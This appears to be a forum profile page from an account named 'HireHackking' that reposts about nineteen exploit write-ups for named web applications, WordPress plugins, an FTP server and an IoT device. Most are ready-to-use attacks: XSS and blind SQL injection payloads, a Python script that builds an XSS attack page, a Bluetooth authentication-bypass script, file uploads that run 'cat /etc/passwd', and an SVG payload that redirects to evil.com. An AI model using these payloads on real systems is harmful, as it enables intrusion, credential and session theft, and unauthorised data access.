Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Joomla JLex Review 6.0.1 - Reflected XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Joomla JLex Review 6.0.1 - Reflected XSS # Exploit Author: CraCkEr # Date: 01/08/2023 # Vendor: JLexArt # Vendor Homepage: https://jlexart.com/ # Software Link: https://extensions.joomla.org/extension/jlex-review/ # Demo: https://jlexreview.jlexart.com/ # Version: 6.0.1 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: / URL parameter is vulnerable to XSS https://website/?review_id=5&itwed"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"b7yzn=1 XSS Payloads: itwed"onmouseover="confirm(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"b7yzn
  2. HireHackking

    WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated) # Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt # Date: 2023-07-27 # Exploit Author: Mehran Seifalinia # Vendor Homepage: https://ninjaforms.com/ # Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip # Version: 3.6.25 # Tested on: Windows 10 # CVE: CVE-2023-37979 from requests import get from sys import argv from os import getcwd import webbrowser from time import sleep # Values: url = argv[-1] if url[-1] == "/": url = url.rstrip("/") # Constants CVE_NAME = "CVE-2023-37979" VULNERABLE_VERSION = "3.6.25" # HTML template HTML_TEMPLATE = f"""<!DOCTYPE html> <!-- Created By Mehran Seifalinia --> <html> <head> <title>{CVE_NAME}</title> <style> body {{ font-family: Arial, sans-serif; background-color: #f7f7f7; color: #333; margin: 0; padding: 0; }} header {{ background-color: #4CAF50; padding: 10px; text-align: center; color: white; font-size: 24px; }} .cool-button {{ background-color: #007bff; color: white; padding: 10px 20px; border: none; cursor: pointer; font-size: 16px; border-radius: 4px; }} .cool-button:hover {{ background-color: #0056b3; }} </style> </head> <body> <header> Ninja-forms reflected XSS ({CVE_NAME})</br> Created by Mehran Seifalinia </header> <div style="padding: 20px;"> <form action="{url}/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="nf&#95;batch&#95;process" /> <input type="hidden" name="batch&#95;type" value="import&#95;form&#95;template" /> <input type="hidden" name="security" value="e29f2d8dca" /> <input type="hidden" name="extraData&#91;template&#93;" value="formtemplate&#45;contactformd" /> <input type="hidden" name="method&#95;override" value="&#95;respond" /> <input type="hidden" name="data" value="Mehran"&#125;&#125;<img&#32;src&#61;Seifalinia&#32;onerror&#61;alert&#40;String&#46;fromCharCode&#40;78&#44;105&#44;110&#44;106&#44;97&#44;45&#44;102&#44;111&#44;114&#44;109&#44;115&#44;32&#44;114&#44;101&#44;102&#44;108&#44;101&#44;99&#44;116&#44;101&#44;100&#44;32&#44;88&#44;83&#44;83&#44;10&#44;67&#44;86&#44;69&#44;45&#44;50&#44;48&#44;50&#44;51&#44;45&#44;51&#44;55&#44;57&#44;55&#44;57&#44;10&#44;45&#44;77&#44;101&#44;104&#44;114&#44;97&#44;110&#44;32&#44;83&#44;101&#44;105&#44;102&#44;97&#44;108&#44;105&#44;110&#44;105&#44;97&#44;45&#41;&#41;>" /> <input type="submit" class="cool-button" value="Click here to Execute XSS" /> </form> </div> <div style="background-color:red;color:white;padding:1%;">After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.</div> <footer> <a href="https://github.com/Mehran-Seifalinia">Github</a> </br> <a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a </footer> </body> </html> """ def exploit(): with open(f"{CVE_NAME}.html", "w") as poc: poc.write(HTML_TEMPLATE) print(f"[@] POC Generated at {getcwd()}\{CVE_NAME}.html") print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^") sleep(2) webbrowser.open(f"{getcwd()}\{CVE_NAME}.html") # Check if the vulnerable version is installed def check_CVE(): try: response = get(url + "/wp-content/plugins/ninja-forms/readme.txt") if response.status_code != 200 or not("Ninja Forms" in response.text): print("[!] Ninja-forms plugin has not installed on this site.") return False else: version = response.text.split("Stable tag:")[1].split("License")[0].split()[0] main_version = int(version.split(".")[0]) partial_version = int(version.split(".")[1]) final_version = int(version.split(".")[2]) if (main_version < 3) or (main_version == 3 and partial_version < 6) or (main_version == 3 and partial_version == 6 and final_version <= 25): print(f"[*] Vulnerable Nonja-forms version {version} detected!") return True else: print(f"[!] Nonja-forms version {version} is not vulnerable!") return False except Exception as error: print(f"[!] Error: {error}") exit() # Check syntax of the script def check_script(): usage = f""" Usage: {argv[0].split("/")[-1].split("/")[-1]} [OPTIONS] [TARGET] OPTIONS: --exploit: Open a browser and execute the vulnerability. TARGET: An URL starts with 'http://' or 'https://' Examples: > {argv[0].split("/")[-1]} https://vulnsite.com > {argv[0].split("/")[-1]} --exploit https://vulnsite.com """ try: if len(argv) < 2 or len(argv) > 3: print("[!] Syntax error...") print(usage) exit() elif not url.startswith(tuple(["http://", "https://"])): print("[!] Invalid target...\n\tTarget most starts with 'http://' or 'https://'") exit() else: for arg in argv: if arg == argv[0]: print("[*]Starting the script >>>") state = check_CVE() if state == False: exit() elif arg.lower() == "--exploit": exploit() elif arg == url: continue else: print(f"[!] What the heck is '{arg}' in the command?") except Exception as error: print(f"[!] Error: {error}") exit() if __name__ == "__main__": check_script()
  3. HireHackking

    PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS # Exploit Author: CraCkEr # Date: 20/07/2023 # Vendor: PHPJabbers # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/shuttle-booking-software/ # Version: 1.0 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4112 ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /index.php URL parameter is vulnerable to RXSS https://website/index.php/gm5rj"><script>alert(1)</script>bwude?controller=pjAdmin&action=pjActionLogin&err=1
  4. HireHackking

    PHPJabbers Taxi Booking 2.0 - Reflected XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PHPJabbers Taxi Booking 2.0 - Reflected XSS # Exploit Author: CraCkEr # Date: 22/07/2023 # Vendor: PHPJabbers # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/taxi-booking-script/ # Version: 2.0 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4116 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /index.php GET parameter 'index' is vulnerable to RXSS https://website/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=[XSS] [-] Done
  5. HireHackking

    PHPJabbers Cleaning Business 1.0 - Reflected XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PHPJabbers Cleaning Business 1.0 - Reflected XSS # Exploit Author: CraCkEr # Date: 21/07/2023 # Vendor: PHPJabbers # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/cleaning-business-software/ # Version: 1.0 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4115 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /index.php GET parameter 'index' is vulnerable to RXSS https://website/index.php?controller=pjFront&action=pjActionServices&locale=1&index=[XSS] [-] Done
  6. HireHackking

    PHPJabbers Service Booking Script 1.0 - Reflected XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PHPJabbers Service Booking Script 1.0 - Reflected XSS # Exploit Author: CraCkEr # Date: 21/07/2023 # Vendor: PHPJabbers # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/service-booking-script/ # Version: 1.0 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4113 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /index.php GET parameter 'index' is vulnerable to RXSS https://website/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=[XSS]
  7. HireHackking

    PHPJabbers Night Club Booking 1.0 - Reflected XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PHPJabbers Night Club Booking 1.0 - Reflected XSS # Exploit Author: CraCkEr # Date: 21/07/2023 # Vendor: PHPJabbers # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/night-club-booking-software/ # Version: 1.0 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4114 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /index.php GET parameter 'index' is vulnerable to RXSS https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=
  8. HireHackking

    WordPress adivaha Travel Plugin 2.3 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress adivaha Travel Plugin 2.3 - SQL Injection # Exploit Author: CraCkEr # Date: 29/07/2023 # Vendor: adivaha - Travel Tech Company # Vendor Homepage: https://www.adivaha.com/ # Software Link: https://wordpress.org/plugins/adiaha-hotel/ # Demo: https://www.adivaha.com/demo/adivaha-online/ # Version: 2.3 # Tested on: Windows 10 Pro # Impact: Database Access ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /mobile-app/v3/ GET parameter 'pid' is vulnerable to SQL Injection https://website/mobile-app/v3/?pid=[SQLI]&isMobile=chatbot --- Parameter: pid (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: pid=77A89299'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&isMobile=chatbot --- [-] Done
  9. HireHackking

    Campcodes Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload # Date: 3-8-2023 # Category: Web Application # Exploit Author: Rajdip Dey Sarkar # Version: 3.3 # Tested on: Windows/Kali # CVE: CVE-2023-39115 Description: ---------------- An arbitrary file upload vulnerability in Campcodes Online Matrimonial Website System Script v3.3 allows attackers to execute arbitrary code via uploading a crafted SVG file. SVG Payload ------------------ <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert("You have been hacked!!") window.location.href="https://evil.com" </script> </svg> Steps to reproduce -------------------------- -Login with your creds -Navigate to this directory - /profile-settings -Click on Gallery -> Add New Image -> Browser -> Add Files -Choose the SVG file and upload done -Click the image!! Payload Triggered Burp Request ------------------- POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E Content-Type: multipart/form-data; boundary=---------------------------167707198418121100152548123485 Content-Length: 1044 Origin: http://localhost Connection: close Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg; acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------167707198418121100152548123485 Content-Disposition: form-data; name="relativePath" null -----------------------------167707198418121100152548123485 Content-Disposition: form-data; name="name" file (1).svg -----------------------------167707198418121100152548123485 Content-Disposition: form-data; name="type" image/svg+xml -----------------------------167707198418121100152548123485 Content-Disposition: form-data; name="aiz_file"; filename="file (1).svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert("You have been hacked!!") window.location.href="https://evil.com" </script> </svg> -----------------------------167707198418121100152548123485--
  10. HireHackking

    Academy LMS 6.0 - Reflected XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Academy LMS 6.0 - Reflected XSS # Exploit Author: CraCkEr # Date: 22/07/2023 # Vendor: Creativeitem # Vendor Homepage: https://creativeitem.com/ # Software Link: https://demo.creativeitem.com/academy/ # Version: 6.0 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4119 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /academy/home/courses GET parameter 'query' is vulnerable to XSS https://website/academy/home/courses?query=[XSS] Path: /academy/home/courses GET parameter 'sort_by' is vulnerable to XSS https://website/academy/home/courses?category=web-design&price=all&level=all&language=all&rating=all&sort_by=[XSS] XSS Payloads (Blocked) : <script>alert(1)</script> ldt4d"><ScRiPt>alert(1)</ScRiPt>nuydd XSS Payload Bypass Filter : cplvz"><img src=a onerror=alert(1)>fk4ap [-] Done
  11. HireHackking

    PHPJabbers Rental Property Booking 2.0 - Reflected XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PHPJabbers Rental Property Booking 2.0 - Reflected XSS # Exploit Author: CraCkEr # Date: 22/07/2023 # Vendor: PHPJabbers # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/rental-property-booking-calendar/ # Version: 2.0 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4117 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /index.php GET parameter 'index' is vulnerable to RXSS https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date= [-] Done
  12. HireHackking

    Shelly PRO 4PM v0.11.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    #!/bin/bash # Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass # Google Dork: NA # Date: 2nd August 2023 # Exploit Author: The Security Team [exploitsecurity.io] # Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability # Vendor Homepage: https://www.shelly.com/ # Software Link: NA # Version: Firmware v0.11.0 (REQUIRED) # Tested on: MacOS/Linux # CVE : CVE-2023-33383 IFS= failed=$false RED="\e[31m" GREEN="\e[92m" WHITE="\e[97m" ENDCOLOR="\e[0m" substring="Connection refused" banner() { clear echo -e "${GREEN}[+]*********************************************************[+]" echo -e "${GREEN}| Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}] |" echo -e "${GREEN}| Description: Shelly PRO 4PM - Out of Bounds |" echo -e "${GREEN}| CVE: CVE-2023-33383 |" echo -e "${GREEN}[+]*********************************************************[+]" echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}" } banner read -s -n 1 key if [ "$key" = "x" ]; then exit 0; elif [ "$key" = "" ]; then gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary) if [ -z "$gattout" ]; then echo -e "${RED}Connection timed out${ENDCOLOR}" exit 0; else sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1 echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}" sleep 1 if [ $? -eq 1 ]; then $failed=$true exit 0; fi sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1 sleep 1 if [ $? -eq 1 ]; then $failed=$true echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}" exit 0; else sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1 sleep 1 for i in {1..5} do echo -ne "${GREEN}." sleep 1 done echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}" fi fi fi
  13. HireHackking

    Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access # Date: 03.08.2023 # Exploit Author: Miguel Santareno # Vendor Homepage: https://www.myeventon.com/ # Version: 4.4 # Tested on: Google and Firefox latest version # CVE : CVE-2023-2796 # 1. Description The plugin lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id. # 2. Proof of Concept (PoC) Proof of Concept: https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=value
  14. HireHackking

    Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE) Application: webedition Cms Version: v2.9.8.8 Bugs: RCE Technology: PHP Vendor URL: https://www.webedition.org/ Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1 Date of found: 03.08.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps 1. Login account 2. Go to New -> Webedition page -> empty page 3. Select php 4. Set as "><?php echo system("cat /etc/passwd");?> Description area Poc request: POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1 Host: localhost Content-Length: 1621 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300 Connection: close we_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1
  15. HireHackking

    Webutler v3.2 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Webutler v3.2 - Remote Code Execution (RCE) Application: webutler Cms Version: v3.2 Bugs: RCE Technology: PHP Vendor URL: https://webutler.de/en Software Link: http://webutler.de/download/webutler_v3.2.zip Date of found: 03.08.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. login to account as admin 2. go to visit media 3.upload phar file 4. upload poc.phar file poc.phar file contents : <?php echo system("cat /etc/passwd");?> 5. Visit to poc.phar file poc request: POST /webutler_v3.2/admin/browser/index.php?upload=newfile&types=file&actualfolder=%2F&filename=poc.phar&overwrite=true HTTP/1.1 Host: localhost Content-Length: 40 sec-ch-ua: sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 X_FILENAME: poc.phar sec-ch-ua-platform: "" Accept: */* Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/webutler_v3.2/admin/browser/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: WEBUTLER=ekgfsfhi3ocqdvv7ukqoropolu Connection: close <?php echo system("cat /etc/passwd");?>
  16. HireHackking

    Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR # Date: 03.08.2023 # Exploit Author: Miguel Santareno # Vendor Homepage: https://www.myeventon.com/ # Version: 4.4 # Tested on: Google and Firefox latest version # CVE : CVE-2023-3219 # 1. Description The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors to access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post. # 2. Proof of Concept (PoC) Proof of Concept: https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=<any post id>
  17. HireHackking

    Webedition CMS v2.9.8.8 - Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Webedition CMS v2.9.8.8 - Stored XSS Application: Webedition CMS Version: v2.9.8.8 Bugs: Stored Xss Technology: PHP Vendor URL: https://www.webedition.org/ Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1 Date of found: 03.08.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps 1. Login to account 2. Go to New -> Media -> Image 3. Upload malicious svg file svg file content: """ <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> """ Poc request: POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1 Host: localhost Content-Length: 761 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=73fee01822cc1e1b9ae2d7974583bb8e Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300 Connection: close we_transaction=73fee01822cc1e1b9ae2d7974583bb8e&we_cea6f7e60ce62be78e59f849855d2038_Filename=malas&we_cea6f7e60ce62be78e59f849855d2038_Extension=.svg&wetmp_we_cea6f7e60ce62be78e59f849855d2038_Extension=&we_cea6f7e60ce62be78e59f849855d2038_ParentPath=%2F&we_cea6f7e60ce62be78e59f849855d2038_ParentID=0&yuiAcContentTypeParentPath=&we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&check_we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&we_cea6f7e60ce62be78e59f849855d2038_IsProtected=0&fold%5B0%5D=0&fold_named%5BPropertyPage_2%5D=0&fold%5B1%5D=0&fold_named%5BPropertyPage_3%5D=0&wetmp_cea6f7e60ce62be78e59f849855d2038_CreatorID=%2Fadmin&we_cea6f7e60ce62be78e59f849855d2038_CreatorID=1&we_cea6f7e60ce62be78e59f849855d2038_RestrictOwners=0&we_complete_request=1
  18. HireHackking

    Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS) # Discovered by: Yehia Elghaly # Discovered Date: 2023-08-04 # Vendor Homepage: https://www.xlightftpd.com/ # Software Link : https://www.xlightftpd.com/download/setup.exe # Tested Version: 3.9.3.6 # Vulnerability Type: Buffer Overflow Local # Tested on OS: Windows XP Professional SP3 - Windows 11 x64 # Description: Xlight FTP Server 3.9.3.6 'Execute Program' Buffer Overflow (PoC) # Steps to reproduce: # 1. - Download and Xlight FTP Server # 2. - Run the python script and it will create exploit.txt file. # 3. - Open Xlight FTP Server 3.9.3.6 # 4. - "File and Directory - Modify Virtual Server Configuration - Advanced - Misc- Setup # 6. - Execute a Program after use logged in- Paste the characters # 7 - Crashed #!/usr/bin/env python3 exploit = 'A' * 294 try: with open("exploit.txt","w") as file: file.write(exploit) print("POC is created") except: print("POC not created")
  19. HireHackking

    WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution

    HireHackking posted a blog entry in Hacker Technology
